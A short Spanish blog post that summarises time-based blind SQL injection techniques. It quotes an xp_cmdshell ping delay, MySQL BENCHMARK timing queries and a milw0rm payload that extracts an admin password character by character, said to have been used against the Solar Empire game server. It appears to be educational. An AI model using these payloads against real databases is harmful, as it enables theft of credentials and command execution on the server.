Inyección SQL Advance

Leyendo por ahí, encontre otros metodos de inyección que a de tener mucho cuidado...
los ejemplo aquí publicados son solo con fines educativos.
“Data Mining with SQL Injection and Inference” donde expone algunas técnicas :P de tiempo de retardo:

xp_cmdshell ‘ping –n 10 127.0.0.1’ ? aplicación en pausa durante 10 segundos.

“SQL Injection Cheat Sheet” de Ronald van den Heetkamp, muestra unos trucos de inyección SQL a ciegas para MySQL, basados en Benchmark, funciones que pueden llegar a generar tiempos de retardos,

SELECT BENCHMARK(10000000,ENCODE(’abc’,'123′)); [around 5 sec]
SELECT BENCHMARK(1000000,MD5(CHAR(116))) [ around 7 sec]
Ejemplo: SELECT IF( user = ‘root’, BENCHMARK(1000000,MD5( ‘x’ )),NULL) FROM login

Esta es otra muestra de la que salio en milw0rm:

¡$sql=”F***You’),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, “.$j.”, 1)) =”.$i.”) & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*”;

Esto lo usaron para atacar el servidor de un juego llamado Solar Empire.
Pues si, la verdad todo va evolucionando, las técnicas, herramientas, todo… por eso me llamo mucho la atención este articulo que resumí de Microsoft.

Calivent | 13 Febrero, 7:58pm | Informatica | 0 comentarios
« Somos Programadores
roban cuenta de Christian Van Der Henst (Maestros del Web, Foros del web) »
Trackback URI: http://cali.perudatanet.com/index.php?trackback/48

Dejar un comentario

Escribe el código Captcha que estás viendo

Fuentes XML de comentario: RSS | Atom